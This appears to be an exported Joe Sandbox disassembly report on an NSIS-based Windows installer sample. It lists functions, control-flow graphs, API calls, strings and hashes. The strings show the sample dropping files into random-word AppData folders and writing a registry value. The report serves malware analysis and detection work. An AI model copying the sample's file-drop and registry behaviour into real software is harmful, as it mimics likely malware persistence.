                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                      • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                      • API String ID: 717251189-905382516
                                      • Opcode ID: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                      • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                      • Opcode Fuzzy Hash: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                      • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E
                                      Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 563 40176f-401794 call 402c37 call 405b94 568 401796-40179c call 40624c 563->568 569 40179e-4017b0 call 40624c call 405b1d lstrcatW 563->569 574 4017b5-4017b6 call 4064e0 568->574 569->574 578 4017bb-4017bf 574->578 579 4017c1-4017cb call 40658f 578->579 580 4017f2-4017f5 578->580 587 4017dd-4017ef 579->587 588 4017cd-4017db CompareFileTime 579->588 581 4017f7-4017f8 call 405d19 580->581 582 4017fd-401819 call 405d3e 580->582 581->582 590 40181b-40181e 582->590 591 40188d-4018b6 call 4052b0 call 4030fa 582->591 587->580 588->587 592 401820-40185e call 40624c * 2 call 40626e call 40624c call 4058ae 590->592 593 40186f-401879 call 4052b0 590->593 603 4018b8-4018bc 591->603 604 4018be-4018ca SetFileTime 591->604 592->578 625 401864-401865 592->625 605 401882-401888 593->605 603->604 607 4018d0-4018db CloseHandle 603->607 604->607 608 402ac8 605->608 611 4018e1-4018e4 607->611 612 402abf-402ac2 607->612 613 402aca-402ace 608->613 615 4018e6-4018f7 call 40626e lstrcatW 611->615 616 4018f9-4018fc call 40626e 611->616 612->608 622 401901-4022f6 call 4058ae 615->622 616->622 622->612 622->613 625->605 627 401867-401868 625->627 627->593
                                      APIs
                                      • lstrcatW.KERNEL32(00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene,?,?,00000031), ref: 004017B0
                                      • CompareFileTime.KERNEL32(-00000014,?,Noncyclical,Noncyclical,00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene,?,?,00000031), ref: 004017D5
                                        • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                        • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                        • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                        • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                        • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed), ref: 0040531D
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                      • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene$C:\Windows\Intragantes.geo$Noncyclical$sarcoderma
                                      • API String ID: 1941528284-1591310664
                                      • Opcode ID: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                      • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
                                      • Opcode Fuzzy Hash: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                      • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D
                                      Function 004052B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 629 4052b0-4052c5 630 4052cb-4052dc 629->630 631 40537c-405380 629->631 632 4052e7-4052f3 lstrlenW 630->632 633 4052de-4052e2 call 40626e 630->633 635 405310-405314 632->635 636 4052f5-405305 lstrlenW 632->636 633->632 638 405323-405327 635->638 639 405316-40531d SetWindowTextW 635->639 636->631 637 405307-40530b lstrcatW 636->637 637->635 640 405329-40536b SendMessageW * 3 638->640 641 40536d-40536f 638->641 639->638 640->641 641->631 642 405371-405374 641->642 642->631
                                      APIs
                                      • lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                      • lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                      • lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                      • SetWindowTextW.USER32(Completed,Completed), ref: 0040531D
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                      • String ID: Completed
                                      • API String ID: 2531174081-3087654605
                                      • Opcode ID: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                      • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                      • Opcode Fuzzy Hash: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                      • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68
                                      Function 004065B6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 643 4065b6-4065d6 GetSystemDirectoryW 644 4065d8 643->644 645 4065da-4065dc 643->645 644->645 646 4065ed-4065ef 645->646 647 4065de-4065e7 645->647 649 4065f0-406623 wsprintfW LoadLibraryExW 646->649 647->646 648 4065e9-4065eb 647->648 648->649
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                      • wsprintfW.USER32 ref: 00406608
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                      • String ID: %s%S.dll$UXTHEME$\
                                      • API String ID: 2200240437-1946221925
                                      • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                      • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                      • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                      • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8
                                      Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 650 4030fa-403111 651 403113 650->651 652 40311a-403122 650->652 651->652 653 403124 652->653 654 403129-40312e 652->654 653->654 655 403130-403139 call 4032f5 654->655 656 40313e-40314b call 4032df 654->656 655->656 660 403151-403155 656->660 661 403296 656->661 662 40315b-40317b GetTickCount call 406787 660->662 663 40327f-403281 660->663 664 403298-403299 661->664 674 4032d5 662->674 676 403181-403189 662->676 665 403283-403286 663->665 666 4032ca-4032ce 663->666 668 4032d8-4032dc 664->668 669 403288 665->669 670 40328b-403294 call 4032df 665->670 671 4032d0 666->671 672 40329b-4032a1 666->672 669->670 670->661 684 4032d2 670->684 671->674 677 4032a3 672->677 678 4032a6-4032b4 call 4032df 672->678 674->668 681 40318b 676->681 682 40318e-40319c call 4032df 676->682 677->678 678->661 686 4032b6-4032c2 call 405df0 678->686 681->682 682->661 689 4031a2-4031ab 682->689 684->674 693 4032c4-4032c7 686->693 694 40327b-40327d 686->694 691 4031b1-4031ce call 4067a7 689->691 696 4031d4-4031eb GetTickCount 691->696 697 403277-403279 691->697 693->666 694->664 698 403236-403238 696->698 699 4031ed-4031f5 696->699 697->664 702 40323a-40323e 698->702 703 40326b-40326f 698->703 700 4031f7-4031fb 699->700 701 4031fd-40322e MulDiv wsprintfW call 4052b0 699->701 700->698 700->701 708 403233 701->708 706 403240-403245 call 405df0 702->706 707 403253-403259 702->707 703->676 704 403275 703->704 704->674 712 40324a-40324c 706->712 710 40325f-403263 707->710 708->698 710->691 711 403269 710->711 711->674 712->694 713 40324e-403251 712->713 713->710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CountTick$wsprintf
                                      • String ID: ... %d%%
                                      • API String ID: 551687249-2449383134
                                      • Opcode ID: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                      • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                      • Opcode Fuzzy Hash: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                      • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9
                                      Function 0040577F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 714 40577f-4057ca CreateDirectoryW 715 4057d0-4057dd GetLastError 714->715 716 4057cc-4057ce 714->716 717 4057f7-4057f9 715->717 718 4057df-4057f3 SetFileSecurityW 715->718 716->717 718->716 719 4057f5 GetLastError 718->719 719->717
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                      • GetLastError.KERNEL32 ref: 004057D6
                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                      • GetLastError.KERNEL32 ref: 004057F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                      • String ID: C:\Users\user\Desktop
                                      • API String ID: 3449924974-224404859
                                      • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                      • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                      • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                      • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9
                                      Function 00405D6D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 720 405d6d-405d79 721 405d7a-405dae GetTickCount GetTempFileNameW 720->721 722 405db0-405db2 721->722 723 405dbd-405dbf 721->723 722->721 724 405db4 722->724 725 405db7-405dba 723->725 724->725
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00405D8B
                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\SDWLLRJcsY.exe",0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589), ref: 00405DA6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: "C:\Users\user\Desktop\SDWLLRJcsY.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                      • API String ID: 1716503409-1830689474
                                      • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                      • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                      • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                      • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64
                                      Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 726 401c19-401c39 call 402c15 * 2 731 401c45-401c49 726->731 732 401c3b-401c42 call 402c37 726->732 734 401c55-401c5b 731->734 735 401c4b-401c52 call 402c37 731->735 732->731 738 401ca9-401cd3 call 402c37 * 2 FindWindowExW 734->738 739 401c5d-401c79 call 402c15 * 2 734->739 735->734 751 401cd9 738->751 749 401c99-401ca7 SendMessageW 739->749 750 401c7b-401c97 SendMessageTimeoutW 739->750 749->751 752 401cdc-401cdf 750->752 751->752 753 401ce5 752->753 754 402abf-402ace 752->754 753->754
                                      APIs
                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend$Timeout
                                      • String ID: !
                                      • API String ID: 1777923405-2657877971
                                      • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                      • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                      • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                      • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28
                                      Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 757 4023de-40240f call 402c37 * 2 call 402cc7 764 402415-40241f 757->764 765 402abf-402ace 757->765 766 402421-40242e call 402c37 lstrlenW 764->766 767 402432-402435 764->767 766->767 770 402437-402448 call 402c15 767->770 771 402449-40244c 767->771 770->771 775 40245d-402471 RegSetValueExW 771->775 776 40244e-402458 call 4030fa 771->776 779 402473 775->779 780 402476-402557 RegCloseKey 775->780 776->775 779->780 780->765 782 402885-40288c 780->782 782->765
                                      APIs
                                      • lstrlenW.KERNEL32(sarcoderma,00000023,00000011,00000002), ref: 00402429
                                      • RegSetValueExW.KERNELBASE(?,?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402469
                                      • RegCloseKey.KERNELBASE(?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402551
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CloseValuelstrlen
                                      • String ID: sarcoderma
                                      • API String ID: 2655323295-3317469366
                                      • Opcode ID: 5b41d600a9c01ed503e2f7d7031b514b7e0553d86e83f8d8ce72929142521f87
                                      • Instruction ID: f6ab6de36865f89e990f87fcf60bb758a602a58abc301ab7ae12c482c30fe319
                                      • Opcode Fuzzy Hash: 5b41d600a9c01ed503e2f7d7031b514b7e0553d86e83f8d8ce72929142521f87
                                      • Instruction Fuzzy Hash: 7C118171E00108BEEB10AFA5DE49EAEBAB8EB54354F11803AF505F71D1DBB84D419B58
                                      Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                      • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                      • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
